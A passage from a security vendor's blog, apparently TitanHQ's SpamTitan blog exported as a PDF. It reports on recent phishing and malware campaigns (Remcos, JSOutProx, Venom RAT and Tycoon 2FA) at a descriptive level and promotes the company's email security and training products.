users\r\nthat they always need to be on their guard whether they are on email, SMS, instant messaging services, or the\r\nphone. By running training courses continuously throughout the year, businesses can develop a security culture by\r\ntraining their employees to be constantly on the lookout for phishing and malware threats and developing the\r\nskills that allow them to identify threats.\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 81 of 136\n\nDeveloping, automating, and updating training courses to include information on the latest threats, tactics\r\ntechniques, and procedures used by threat actors is easy with the SafeTitan security awareness training platform.\r\nSafeTitan makes training fun and engaging for end users and the platform has been shown to reduce susceptibility\r\nto phishing and malware threats by up to 80%.\r\nIf you are not currently running a comprehensive security awareness training program for your workforce or if\r\nyou are looking to improve your training. Give the TitanHQ team a call and ask about SafeTitan. SafeTitan is one\r\nproduct in a suite of cloud-based security solutions for businesses and managed service providers, which includes\r\nan enterprise spam filter, a malicious file sandbox for email, a DNS-based web filter, email encryption, email\r\narchiving, and phishing protection for M365.\r\nHow to Protect Against Advanced Email and SMS Phishing Threats\r\nby G Hunt | May 27, 2024 | Phishing \u0026 Email Spam, Security Awareness, Spam Advice\r\nEmail phishing is the most common form of phishing, with email providing threat actors with an easy way of\r\ngetting their malicious messages in front of employees. Phishing emails typically include a URL along with a\r\npressing reason for clicking the link. The URLs are often masked to make them appear legitimate, either with a\r\nbutton or link text relevant to the lure in the message. Email attachments are often added to emails that contain\r\nmalicious scripts for downloading a variety of malicious payloads, or links to websites where malware is hosted.\r\nWhile there are many email security solutions available to businesses, many lack the sophistication to block\r\nadvanced phishing threats as they rely on threat intelligence, antivirus software, and reputation checks. While\r\nthese are important and effective at blocking the bulk of phishing and malspam emails, they are not effective at\r\nblocking zero-day attacks, business email compromise, and advanced phishing threats.\r\nMore advanced features include email sandboxing for detecting and quarantining zero-day malware threats and\r\nmalicious scripts, greylisting for increasing the spam catch rate, and AI and machine learning capabilities that can\r\nassess messages and identify threats based on how they differ from the messages that are typically received by the\r\nbusiness. SpamTitan, a cloud-based anti-spam service from TitanHQ, has these features and more. Independent\r\ntests have shown that the solution blocks more than 99.99% of spam emails, 99.95% of malware, and more than\r\n99.91% of phishing emails. SpamTitan can be provided as a hosted email filter or as a gateway spam filter for\r\ninstallation on-premises on existing hardware, serving as a virtual anti-spam appliance.\r\nMicrosoft 365 users often complain about the phishing catch rate of the protections provided by Microsoft, which\r\nare EOP only for most licenses and EOP and Defender for the most expensive licenses. While these protections\r\nare effective at blocking spam and known malware, they fall short of what is required for blocking advanced\r\nthreats. To improve Microsoft 365 security and block the threats that Microsoft misses, TitanHQ has developed\r\nPhishTitan. PhishTitan augments Microsoft 365 defenses and is the easiest way of improving the Office 365 spam\r\nfilter. These advanced defenses are now vital due to the increase in attacks. The Anti-Phishing Working Group\r\n(APWG) has reported that more phishing attacks were conducted in 2023 than ever before.\r\nMassive Increase in Text Message Phishing Scams\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 82 of 136\n\nBlocking email phishing attempts is straightforward with advanced email security solutions, which make it much\r\nharder for phishers to get their messages in front of employees. One of the ways that threat actors have adapted is\r\nby switching to SMS phishing attacks, which no email security solution can block. APWG has reported a major\r\nincrease in SMS-based phishing attempts.\r\nA recent study attempted to determine the extent to which SMS phishing is being used. Researchers used SMS\r\ngateways – websites that allow users to obtain disposable phone numbers – to obtain a large number of phone\r\nnumbers for the study. They then waited to see how long it took for SMS phishing messages to be received. The\r\nstudy involved 2,011 phone numbers and over 396 days the researchers received an astonishing 67,991 SMS\r\nphishing messages, which averages almost 34 per number. The researchers analyzed the messages and identified\r\n35,128 unique campaigns that they associated with 600 phishing operations. Several of the threat actors had even\r\nset up URL shortening services on their own domains to hide the destination URLs. With these shortening\r\nservices, the only way to tell that the domain is malicious is to click the link.\r\nBlocking SMS phishing threats is difficult for businesses and the primary defense is security awareness training.\r\nSMS phishing should be included in security awareness training to make employees aware of the threat, as it is\r\nhighly likely that they will encounter many SMS phishing threats. The SafeTitan security awareness platform\r\nmakes creating training courses simple and the platform includes training content on all types of threats, including\r\nSMS, voice, and email phishing. With SafeTitan it is easy to create and automate campaigns, as well as deliver\r\ntraining in real-time in response to employee errors to ensure training is provided when it is likely to have the\r\ngreatest impact – immediately after a mistake is made.\r\nSophisticated Phishing Campaign Abuses Cloudflare Workers\r\nby G Hunt | May 26, 2024 | Phishing \u0026 Email Spam, Security Awareness\r\nCloudflare Workers is being abused in phishing campaigns to obtain credentials for Microsoft, Gmail, Yahoo!, and\r\ncPanel Webmail. The campaigns identified in the past month have mostly targeted individuals in Asia, North\r\nAmerica, and Southern Europe, with the majority of attacks conducted on organizations in the technology,\r\nfinance, and banking sectors.\r\nCloudflare Workers is part of the Cloudflare Developer Platform and allows code to be deployed and run from\r\nCloudflare’s global network. It is used to build web functions and applications without having to maintain\r\ninfrastructure. The campaigns were identified by researchers at Netskope Threat Labs. One campaign uses a\r\ntechnique called HTML smuggling, which involves abusing HTML5 and JavaScript features to inject and extract\r\ndata across network boundaries. This is a client-side attack where the malicious activities occur within the user’s\r\nbrowser. HTML smuggling is most commonly associated with malware and is used to bypass network controls by\r\nassembling malicious payloads on the client side. In this case, the malicious payload is a phishing page.\r\nThe phishing page is reconstructed in the user’s browser, and they are prompted to log in to the account for which\r\nthe attacker seeks credentials, such as their Microsoft account. When the victim enters their credentials, they will\r\nbe logged in to the legitimate website and the attacker will then collect the tokens and session cookies.\r\nAnother campaign uses adversary-in-the-middle (AitM) tactics to capture login credentials, cookies, and tokens,\r\nand allow the attackers to compromise accounts that are protected with multi-factor authentication. Cloudflare\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 83 of 136\n\nWorkers is used as a reverse proxy server for the legitimate login page for the credentials being targeted. Traffic\r\nbetween the victim and the login page is intercepted to capture credentials as well as MFA codes and session\r\ncookies. The advantage of this type of attack is the user is shown the exact login page for the credentials being\r\ntargeted. That means that the attacker does not need to create and maintain a copy of the login page.\r\nWhen the user enters their credentials, they are sent to the legitimate login page by the attacker, and the response\r\nfrom the login page is relayed to the victim. The threat actor’s application captures the credentials and the tokens\r\nand cookies in the response. In these CloudFlare Workers phishing campaigns, users can identify the scam by\r\nlooking for the *.workers.dev domain and should be trained to always access login pages by typing the URL\r\ndirectly into the web browser.\r\nDefending against sophisticated phishing attacks requires a combination of security measures including an email\r\nsecurity solution with AI/machine learning capabilities and email sandboxing, regular security awareness training,\r\nand web filtering to block the malicious websites and inspecting HTTP and HTTPS traffic. For more information\r\non improving your defenses, give the TitanHQ team a call.\r\nTwo Dozen Healthcare Email Accounts Compromised in Targeted Phishing\r\nCampaign\r\nby G Hunt | April 25, 2024 | Email Scams, Phishing \u0026 Email Spam\r\nMany phishing campaigns involve indiscriminate emails that are sent in high volume in the hope that some\r\nrecipients will respond. These campaigns tend to involve lures that are likely to be opened by as many users as\r\npossible such as missed deliveries, security warnings about unauthorized account access, and payments that will\r\nsoon be applied to accounts. This spray-and-pray tactic is not nearly as effective as more tailored campaigns\r\ntargeting specific types of users, and to make up for this, the campaigns involve huge volumes of messages. These\r\ncampaigns are relatively easy for email security solutions to detect.\r\nPhishing campaigns that target employees in a single organization can be much harder to identify. The threat actor\r\ntailors the message to the organization being targeted, and even to specific employees in the organization. These\r\ncampaigns often use compromised vendor email accounts, with the emails being sent from trusted domains. There\r\nis a much greater chance of these emails landing in inboxes and the emails being opened by employees.\r\nCampaigns such as this can be highly effective and often result in many email accounts in the organization being\r\ncompromised.\r\nA recent example of this type of attack and the impact it can have comes from California. The Los Angeles\r\nCounty Department of Health Services, an integrated health system that operates public hospitals and clinics in\r\nL.A. County, was targeted in a phishing campaign between February 19, 2024, and February 20, 2024. The emails\r\nappeared to have been sent by a trusted sender, landed in inboxes, and were opened by many employees. The\r\nemails contained a hyperlink that directed users to a website where they were told they needed to enter their login\r\ncredentials. 23 employees fell for the scam and entered their credentials.\r\nThe credentials were captured, and the threat actor was able to access the employees’ email accounts, which\r\ncontained sensitive patient data such as names, dates of birth, contact information, medical record numbers, dates\r\nof service, medical information, and health plan information. While the information exposed in the attack could\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 84 of 136\n\nnot be used for identity theft – Social Security numbers were not compromised – the attacker gained access to\r\ninformation that could be used for medical identity theft. The patients affected could also be targeted in very\r\nconvincing phishing campaigns to obtain further information such as Social Security numbers. Similar attacks\r\nhave been reported by other healthcare organizations where the email accounts contained vast amounts of data,\r\nincluding tens of thousands of Social Security numbers and sensitive financial information.\r\nAfter attacks such as this, additional security awareness training is provided to the workforce to raise awareness of\r\nthe threat from phishing; however, the provision of comprehensive training regularly throughout the year will go a\r\nlong way toward ensuring that attacks such as this do not succeed and that if they do, the resultant data breach is\r\nfar less severe.\r\nTitanHQ’s SafeTitan security awareness training platform allows organizations to conduct comprehensive training\r\ncontinuously, and since each training module is a maximum of 10 minutes, it is easy to fit the training into busy\r\nworkflows. The training platform has a huge range of content, covering a broad range of threats, and when\r\nprograms are run continuously and employees complete a few training modules a month, susceptibility to phishing\r\ndrops considerably, especially when the SafeTitan phishing simulator is also used. The simulator includes\r\ntemplates taken from recent real-world phishing campaigns. If a user responds to one of these simulations, they\r\nare immediately told where they went wrong and are required to complete a training module relevant to that\r\nthreat.\r\nEnd-user security awareness training is an important part of your cybersecurity arsenal, but it is also vital to block\r\nas many phishing emails as possible. TitanHQ’s SpamTitan email security is an advanced, AI and machine\r\nlearning-driven anti-spam solution that blocks more than 99.9% of spam email and phishing threats. The solution\r\nincludes twin antivirus engines for blocking known malware, and sandboxing for blocking zero-day threats, and is\r\na highly effective spam filter for Office 365. With SafeTitan security awareness training and an advanced\r\nMicrosoft 365 spam filter from TitanHQ, businesses will be well protected from phishing threats.\r\nAll TitanHQ solutions are intuitive, easy to use, and can be set up in just a few minutes and are available on a free\r\ntrial to allow you to test them out for yourself before making a purchase decision. Independent reviews from\r\ngenuine users of TitanHQ solutions show SpamTitan is much loved by users. On G2 reviews, SpamTitan is\r\nconsistently given 5-star reviews by end users, who rate it the best spam filter for Outlook due to its effectiveness,\r\nlow cost, ease of use, and the excellent customer service from the TitanHQ team.\r\nSafeTitan and SpamTitan are available on a free trial to allow you to test them out for yourself before making a\r\npurchase decision. Give the TitanHQ team a call today to take the first step toward improving your phishing\r\ndefenses.\r\nRemcos RAT Now Distributed in Spam Email Using VHD Attachments\r\nby G Hunt | April 24, 2024 | Phishing \u0026 Email Spam\r\nCybercriminals are constantly evolving their tactics for delivering malware and one of the most recent changes\r\nconcerns the Remcos RAT.  Remcos was developed by Breaking Security as a legitimate remote administration\r\ntool that can be used for network maintenance, system monitoring, surveillance, and penetration testing; however,\r\nthe tool has been weaponized to create the Remcos Remote Access Trojan (RAT).\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 85 of 136\n\nThe Remocos RAT has extensive capabilities and has been used by cybercriminals since 2016. The malware\r\nallows threat actors to take control of systems and maintain persistent, highly privileged remote access. The\r\nmalware can be used for a range of purposes, with threat actors commonly using it for credential theft, man-in-the-middle internet connections, and to create botnets of infected devices that can be used for distributed denial of\r\nservice attacks (DDoS).\r\nThe Remcos RAT is distributed in spam email campaigns. Since 2016, the most common method for distributing\r\nthe malware used spam emails with malicious Office attachments. Social engineering techniques were used to\r\ntrick users into opening the files and enabling macros; however, campaigns have recently been detected that\r\ndeliver the malware via weaponized virtual hard disk (VHD) files.\r\nSecurity awareness training often focuses on teaching users to be careful when opening Office files and other file\r\ntypes commonly associated with malware distribution. The change to a more unusual file type could result in the\r\nfile being opened, and VHD files are less likely to be identified as malicious by email security solutions.\r\nAn analysis of the extracted VHD files revealed a shortcut file that contained a PowerShell command line that\r\nexecuted a malicious script that ultimately delivered the Remcos RAT via a sophisticated multi-stage delivery\r\nmethod designed to evade security solutions. Once installed, the malware can log keystrokes, take screenshots,\r\nand exfiltrate data to its command-and-control server. The malware also has mass-mailer capabilities and can send\r\ncopies of itself via email from an infected device. According to Check Point, the Remcos RAT rose to the 4th most\r\nprevalent malware threat in March 2024.\r\nThe constantly changing tactics for distributing malware mean network defenders need cybersecurity solutions\r\nthat can adapt and detect zero-day threats. SpamTitan is an advanced email filtering service with AI and machine\r\nlearning-driven threat detection which is capable of identifying and blocking novel phishing and malware\r\ndistribution methods. The machine learning algorithm uses predictive technology to identify previously unseen\r\nattacks, emails are scanned using twin antivirus engines, and suspicious file types are sent to a next-generation\r\nsandbox for behavioral analysis, ensuring even previously unseen malware variants can be identified and blocked.\r\nSpamTitan scans all inbound emails and also includes an outbound email filter to identify malicious emails that\r\nare sent from compromised email accounts and by malicious insiders. SpamTitan also has data loss protection\r\ncapabilities, allowing IT teams to detect and block internal data loss. If your corporate email filter does not include\r\nadvanced threat protection including AI-driven detection and sandboxing, or if you rely on Microsoft’s anti-spam\r\nand anti-phishing protection, sophisticated threats such as zero-day attacks are unlikely to be blocked and your\r\nbusiness will be at risk.\r\nGive the TitanHQ team a call today to find out more about SpamTitan. SpamTitan is delivered as a cloud-based\r\nanti-spam service that integrates seamlessly with Microsoft 365 to improve protection, or as a gateway solution\r\nfor on-premises protection, which can be installed on existing hardware as a virtual anti-spam appliance.\r\nFinancial Institutions Targeted in Phishing Campaign That Delivers the\r\nJSOutProx RAT\r\nby G Hunt | April 17, 2024 | Email Scams, Phishing \u0026 Email Spam\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 86 of 136\n\nA phishing campaign has been running since late March that tricks people into installing a new version of the\r\nremote access trojan, JSOutProx. JSOutProx was first identified in 2019 and is a backdoor that utilizes JavaScript\r\nand .NET that allows users to run shell commands, execute files, take screenshots, control peripheral devices, and\r\ndownload additional malware payloads. The malware is known to be used by a threat actor tracked as Solar\r\nSpider, which mostly targets financial institutions in Central Europe, South Asia, Southeast Asia, and Africa, with\r\nthe latest version of the malware also being used to target organizations in the Middle East.\r\nThe malware has mostly been used on banks and other financial institutions. If infected, the malware collects\r\ninformation about its environment and the attackers then download any of around 14 different plug-ins from either\r\nGitHub or GitLab, based on the information the malware collects about its operating environment. The malware\r\ncan be used to control proxy settings, access Microsoft Outlook account details, capture clipboard content, and\r\nsteal one-time passwords from Symantec VIP.\r\nLike many other remote access trojans, JSOutProx is primarily delivered via phishing emails. A variety of lures\r\nhave been used in the phishing emails but the latest campaign uses fake notifications about SWIFT payments in\r\ntargeted attacks on financial institutions and MoneyGram payment notifications in attacks on individuals, which\r\naim to trick the recipients into installing the malware.\r\nThe latest campaign uses JavaScript attachments that masquerade as PDF files of financial documents contained\r\nin .zip files. If the user attempts to open the fake PDF file, the JavaScript is executed deploying the malware\r\npayload. The main aim of the campaign is to steal user account credentials, gather sensitive financial documents,\r\nand obtain payment account data, which can either be used to make fraudulent transactions or be sold to other\r\nthreat actors on the dark web. Email accounts are often compromised which can be leveraged in Business Email\r\nCompromise (BEC) attacks to steal funds from clients. According to VISA, “The JSOutProx malware poses a\r\nserious threat to financial institutions around the world, and especially those in the AP region as those entities have\r\nbeen more frequently targeted with this malware.”\r\nSince phishing is the main method of malware delivery, the best defense against attacks is advanced anti-spam\r\nsoftware and end-user security awareness training. JSOutProx malware is able to bypass many traditional anti-spam solutions and anti-virus software due to the high level of obfuscation. The best defense is an anti-spam\r\nsolution with AI and machine learning capabilities that can identify the signs of malicious emails by analyzing\r\nmessage headers and message content to determine how they deviate from the emails typically received by the\r\nbusiness and also search for the signs of phishing and malware delivery based on the latest threat intelligence.\r\nTo identify the malicious attachments, an anti-spam solution requires sandboxing. Any messages that pass\r\nstandard antivirus checks are sent to the sandbox where behavior is analyzed to identify malicious actions, rather\r\nthan relying on malware signatures for detection. SpamTitan can extract and analyze files in compressed archives\r\nsuch as .zip and .rar files and in recent independent tests, SpamTitan achieved a phishing catch rate of 99.914%, a\r\nmalware catch rate of 99.511%, with a false positive rate of 0.00%. SpamTitan from TitanHQ is delivered as either\r\na hosted anti-spam service or an anti-spam gateway that is installed on-premises on existing hardware. SpamTitan\r\nhas been developed to be easy to implement and use and meet the needs of businesses of all sizes and managed\r\nservice providers.\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 87 of 136\n\nPhishing emails target employees so it is important to teach them how to identify phishing emails. Due to the fast-changing threat landscape, security awareness training should be provided continuously to the workforce, and\r\nphishing simulations should be conducted to give employees practice at identifying threats. SafeTitan from\r\nTitanHQ can be used to easily create effective training programs that run continuously throughout the year and\r\nkeep employees up to date on the latest threats and tactics, techniques, and procedures used by malicious actors.\r\nSafeTitan also delivers relevant training in real-time in response to security mistakes and phishing simulation\r\nfailures. Check out these anti-spam tips for further information on improving your defenses against phishing and\r\nget in touch with TitanHQ for more information on SpamTitan email security and the SafeTitan security\r\nawareness training platform.\r\nSophisticated Phishing Campaign Delivers Rats via SVG File Attachments\r\nby G Hunt | April 15, 2024 | Email Scams, Phishing \u0026 Email Spam\r\nA sophisticated phishing campaign has been detected that is being used to deliver a variety of Remote Access\r\nTrojan (RAT) malware, including Venom RAT, Remcos RAT, and NanoCore RAT, as well as a stealer that targets\r\ncryptocurrency wallets. The campaign uses email as the initial access vector with the messages purporting to be an\r\ninvoice for a shipment that has recently been delivered. The emails include a Scalable Vector Graphics (SVG) file\r\nattachment – an increasingly common XML-based vector image format.\r\nIf the file is executed, it will drop a compressed (zip) file on the user’s device. The zip file contains a batch file\r\nthat has been created with an obfuscation tool (most likely BatCloak) to allow it to evade anti-virus software. If\r\nnot detected as malicious, a ScrubCrypt batch file is unpacked – another tool used to bypass antivirus protections\r\n– which delivers two executable files that are used to deliver and execute the RAT and establish persistence. This\r\nmethod of delivery allows the malware to evade AMSI (Antimalware Scan Interface) and ETW (Event Tracing for\r\nWindows) antivirus protections.\r\nOne of the primary payloads is Venom RAT, which establishes a connection with its command and control (C2)\r\nserver, transmits sensitive information gathered from the compromised device and runs commands from its C2\r\nserver. Venon RAT can download additional modules and malware payloads, including a stealer malware that\r\ntargets folders associated with cryptocurrency wallets and applications including Atomic Wallet, Electrum,\r\nExodus, Foxmail, and Telegram.\r\nThe sophisticated nature of this campaign and the obfuscation used to hide the malicious payloads from traditional\r\nantivirus software demonstrates the need for advanced email defenses and end-user training. Email security\r\nsolutions that rely on malware signatures are easily bypassed, which is why it is important to use an anti-spam\r\nsolution that incorporates sandboxing for blocking malware and AI and machine learning capabilities to identify\r\nmalicious emails.\r\nSpamTitan uses AI and machine learning algorithms to detect phishing emails that other solutions miss –\r\nincluding Microsoft’s basic and advanced anti-phishing mechanisms for Microsoft 365. SpamTitan includes\r\nSender Policy Framework (SPF), SURBL’s, RBL’s, Bayesian analysis, and more, and the machine learning\r\nalgorithms can detect email messages that deviate from the typical messages received by a business and can\r\nidentify header anomalies, address spoofing, and suspect email body content. All inbound messages are subjected\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 88 of 136\n\nto standard and advanced malware checks, including scans using twin anti-virus engines and email sandboxing.  If\r\nall anti-malware checks are passed, including unpacking and analyzing compressed files, messages are sent to the\r\nsandbox for behavioral analysis.\r\nIn the cloud-based sandbox, malicious actions are identified such as attempts to deliver additional files as is\r\ncommonly seen in multi-stage attacks and C2 calls. In recent independent tests (Virus Bulletin), SpamTitan\r\nachieved a phishing catch rate of 99.914%, a malware catch rate of 99.511%, and a false positive rate of 0.00%.\r\nWith phishing attacks becoming more sophisticated you need to have sophisticated defenses. With email security\r\nprotection provided by SpamTitan and security awareness training delivered using TitanHQ’s award-winning\r\nSafeTitan security awareness training and phishing simulation platform you will be well protected from email-based attacks.\r\nGive the TitanHQ team a call today to find out more about how you can improve your defenses against email-based attacks with sandboxing technology and how to add more layers to your defenses to block the full range of\r\ncyberattacks.\r\nTitanHQ’s Anti-Phishing Solution Now Has Auto-Remediation Feature\r\nby G Hunt | March 31, 2024 | Industry News, Network Security\r\nTitanHQ has added a new auto-remediation feature to its Microsoft 365 anti-phishing solution, PhishTitan, to\r\nbetter meet the needs of managed service providers (MSP) and M365 administrators.\r\nAccording to Statista, more than two million companies worldwide use Microsoft 365, including more than 1.3\r\nmillion in the United States. Given the number of companies that use Microsoft 365, it is naturally a big target for\r\ncybercriminals and nation-state actors. If threat actors can steal M365 credentials, they can access a treasure trove\r\nof valuable business data and gain a foothold for more extensive and damaging attacks. Microsoft offers\r\nprotection against spam, phishing, malware, and business email compromise attacks, but the best level of\r\nprotection is only available with its costly E5 premium license, which is prohibitively expensive for many small\r\nbusinesses. Even companies that can afford this costly license do not get cutting-edge protection against phishing\r\nand BEC attacks.\r\nTo consistently block sophisticated phishing attempts, BEC attacks, and zero-day threats, businesses need more\r\nadvanced protection than Microsoft can offer, and many turn to PhishTitan from TitanHQ – an integrated Cloud\r\nEmail Security Solution (ICES) that provides cutting-edge protection against the most damaging, sophisticated\r\nphishing threats, BEC, account takeover, VIP impersonation, and zero-day attacks. In recent Virus Bulletin Tests,\r\nthe engine that powers PhishTitan achieved an exceptional spam catch rate of 99.983%, a malware catch rate of\r\n99.511%, and a phishing catch rate of 99.914%, with zero false positives. PhishTitan was shown to outperform\r\nMicrosoft’s highest level of protection. For every 80,000 emails received, PhishTitan blocks 20 more unique and\r\nsophisticated attacks than Microsoft’s E5 filtering option.\r\nThe latest update to PhishTitan adds a new auto-remediation feature, which allows administrators to tailor the\r\nmanagement of malicious emails based on the severity level. When a threat is detected, a banner is added to the\r\nemail that warns the user about the threat; however, auto-remediation allows administrators to apply rules to deal\r\nwith these messages according to the threat level, such as automatically diverting the emails to the junk folder.\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 89 of 136\n\nThis feature acts like a virtual SOC and minimizes the risk to end users, especially individuals who tend to ignore\r\nemail banners.\r\nAuto-remediation is just one of the new features PhishTitan has gained since its launch. PhishTitan has also\r\nreceived an update to protect users from the growing threat of QR code phishing attacks (QRishing). QR codes are\r\nproblematic for many anti-spam and anti-phishing solutions, as they cannot decipher the URLs in QR codes and\r\ncheck the destination URL, which is why cybercriminals are increasingly using QR codes in their phishing emails.\r\nPhishTitan can analyze the URLs encoded in QR codes, assess the risk, and notify end users.\r\nPhishTitan also supports allow-listing, which administrators can use to automatically white-list trusted senders to\r\nmake sure that their emails are always delivered, and notifications can also be fed into Microsoft Teams. Since\r\nadministrators can spend a considerable amount of time in the application, a dark mode has been added to improve\r\nthe user experience, and many more updates are planned and will be rolled out soon.\r\n“We are excited to introduce Auto Remediation, QR code protection, and many additional powerful new features\r\nto our valued customers. At TitanHQ, we collaborate closely with partners to develop tailored solutions addressing\r\ncritical customer IT security challenges,” said TitanHQ CEO, Ronan Kavanagh. “PhishTitan provides MSPs with\r\nan unmatched value proposition, featuring effortless deployment and lucrative recurring revenue streams,\r\nultimately delivering a positive return on investment.”\r\nIf you want to improve protection against email threats or have any questions about PhishTitan, give the TitanHQ\r\nteam a call. TitanHQ also offers award-winning DNS filtering, spam filtering, email encryption, email archiving,\r\nsecurity awareness training, and phishing simulation solutions, all of which are available on a free trial.\r\nTitanHQ Achieves Virus Bulletin VBSpam+ Certification with 99.91% Phishing\r\nCatch Rate in Latest Tests\r\nby G Hunt | March 29, 2024 | Phishing \u0026 Email Spam, Spam Software\r\nTitanHQ has claimed a Top 3 position in a recent Virus Bulletin email security test, achieving an exceptional\r\n99.98% spam catch rate and 99.91% phishing catch rate for the cutting-edge filtering engine that powers the\r\nSpamTitan (email security) and PhishTitan (phishing protection) solutions, earning TitanHQ the prestigious\r\nVBSpam+ certification for the products.\r\nVirus Bulletin is a security information portal and independent testing and certification body that has earned a\r\nformidable reputation within the cybersecurity community for providing security professionals with intelligence\r\nabout the latest developments in the global threat landscape. Virus Bulletin conducts regular tests of security\r\nsolutions to determine how well they perform at detecting and blocking threats, and for more than 20 years has\r\nbeen benchmarking cybersecurity solutions. Virus Bulletin’s public certifications cover all types of security threat\r\nprotection, including anti-spam and anti-phishing solutions for enterprises.\r\nIn the Q1, 2024 tests, Virus Bulletin assessed nine comprehensive email security solutions, including TitanHQ’s\r\nemail security suite which comprises SpamTitan and PhishTitan. The email security solutions were put to the test\r\nto assess how effective they are at blocking unsolicited and unwanted spam emails and malicious messages of all\r\ntypes. TitanHQ’s solutions achieved exceptional scores at blocking spam and phishing emails, with a spam catch\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 90 of 136\n\nrate of 99.983%, a malware catch rate of 99.511%, and a phishing catch rate of 99.914% with zero false positives.\r\nThe final score for the Q1, 2024 tests was 99.983, cementing TitanHQ’s position as a leading provider of anti-phishing and anti-spam solutions for managed service providers and businesses.\r\n“This test reaffirms TitanHQ’s unrivaled prowess in spam and phishing protection—we stand as the first choice\r\nfor combating phishing attempts and spam infiltrations,” said Ronan Kavanagh, CEO at TitanHQ. “Our customers\r\nneed not settle for anything less. With TitanHQ solutions, they receive unparalleled defense against phishing and\r\nspam and experience minimal false positives.\r\nWhile there are many ways that cybercriminals and nation state actors breach company networks and gain access\r\nto sensitive data, phishing is the leading initial access vector. Despite phishing being such a prevalent threat, many\r\nbusinesses lack security solutions that can consistently identify and block these malicious messages, which results\r\nin costly compromises, data breaches, and devastating ransomware attacks. According to one study by researchers\r\nat CoreView on 1.6 million Microsoft 365 users, 90% lacked essential security protections that can combat threats\r\nsuch as phishing.\r\nWhile Microsoft has security solutions that can block spam and phishing emails, they are unable to block\r\nadvanced phishing threats. PhishTitan has been developed to work seamlessly with M365 and catch the phishing\r\nthreats that M365 misses. Even Microsoft’s most advanced anti-phishing protection, the costly E5 premium\r\nsecurity offering, fails to block many advanced threats. Testing has shown that for every 80,000 emails received,\r\nPhishTitan identifies and blocks 20 unique, sophisticated phishing attempts that Microsoft’s top solution misses,\r\nand many businesses cannot afford Microsoft’s top level of protection and are reliant on its basic anti-spam and\r\nanti-phishing protection.\r\nIf you want to improve your defenses against phishing and malware and block more spam emails, give the\r\nTitanHQ team a call and ask about SpamTitan and PhishTitan. Both email filtering solutions are available on a\r\nfree trial, so you can put them to the test and see for yourself the difference they make.\r\nTycoon 2FA Phishing Kit Targets M365 and Gmail Credentials and Bypasses MFA\r\nby G Hunt | March 27, 2024 | Phishing \u0026 Email Spam\r\nPhishing is one of the most common methods used to gain access to credentials; however, businesses are\r\nincreasingly implementing multi-factor authentication (MFA) which adds an extra layer of protection and means\r\nstolen credentials cannot be used on their own to gain access to accounts. An additional authentication factor is\r\nrequired before access to the account is granted. While any form of MFA is better than none, MFA does not\r\nprotect against all phishing attacks. There are several popular phishing-as-a-service (PhaaS) platforms that can\r\nsteal credentials and bypass MFA including LabHost, Greatness, and Robin Banks. For a relatively small fee, any\r\ncybercriminal looking to compromise accounts can use the PhaaS platform and gain access to MFA-protected\r\naccounts.\r\nA relatively new PhaaS platform has been growing in popularity since its discovery in October 2023 which has\r\nbeen causing concern in the cybersecurity community. Dubbed Tycoon 2FA, the PhaaS platform is being offered\r\nthrough private Telegram groups. Like many other PhaaS platforms, Tycoon 2FA uses adversary-in-the-middle\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 91 of 136\n\n(AiTM) tactics to steal MFA tokens, allowing access to be gained to accounts. The phishing kit uses at least 1,100\r\ndomains and has been used in thousands of phishing attacks.\r\nLike most phishing attacks, initial contact is made with end users via email. The messages include a malicious link\r\nor a QR code. QR codes are popular with phishers as they communicate a URL to the end user and are difficult for\r\nemail security solutions to identify as malicious. To ensure that the malicious URLs are not detected by security\r\nsolutions, after clicking the link or visiting the website via the QR code, the user must pass a security challenge\r\n(Cloudflare Turnstile). The web page to which the user is directed targets Microsoft 365 or Gmail credentials. The\r\nuser’s email address is captured and used to prefill the login page, and when the user enters their password it is\r\ncaptured and they are directed to a fake MFA page.\r\nThe phishing kit uses a reverse proxy server that relays the user’s credentials to the legitimate service being\r\ntargeted in real-time and similarly captures the session cookie when the MFA challenge is passed. The user is\r\nunlikely to recognize that their account has been compromised as they are redirected to a legitimate-looking page\r\nwhen the MFA mechanism is passed. According to the researchers, many different threat actors have been using\r\nthe kit for their phishing campaigns, with the Tycoon 2FA operators having received almost $395,000 in payments\r\nto their Bitcoin wallet as of March 2024. The price of the phishing kit is $120 for 10 days of usage which shows\r\nhow popular the platform is with cybercriminals.\r\nPhaaS platforms allow cybercriminals to conduct sophisticated attacks and bypass MFA without having to invest\r\ntime and money setting up their own infrastructure they significantly lower the entry barrier for conducting MFA-bypassing phishing attacks. An advanced spam filtering service such as SpamTitan Plus will help to prevent\r\nmalicious emails from reaching inboxes, and is an ideal spam filter for MSPs looking to provide the best level of\r\nprotection for their clients. The SpamTitan suite of email security solutions combines phishing, spam, and\r\nantivirus filtering and independent tests show a spam block rate of 99.983% and a malware block rate of 99.51%.\r\nPhishTitan from TitanHQ greatly improves protection against more advanced phishing campaigns such as those\r\nthat use QR codes. Employees should be provided with regular security awareness training to help them identify\r\nand avoid phishing messages, and businesses should consider using phishing-resistant MFA rather than more basic\r\nforms of 2-factor authentication that use SMS or one-time passwords, which phishing kits such as Tycoon 2FA can\r\neasily bypass.\r\nTitanHQ Expands Global Footprint into Africa with Strategic Alliance with\r\nEquinox Technologies\r\nby G Hunt | March 26, 2024 | Industry News\r\nTitanHQ has announced it has signed a new partnership agreement with Equinox Technologies which will see\r\nTitanHQ’s cybersecurity solutions offered throughout Africa. Equinox Technologies is a pan-African, tech-enabled, business service provider that provides a range of services to more than 40 countries in Africa from 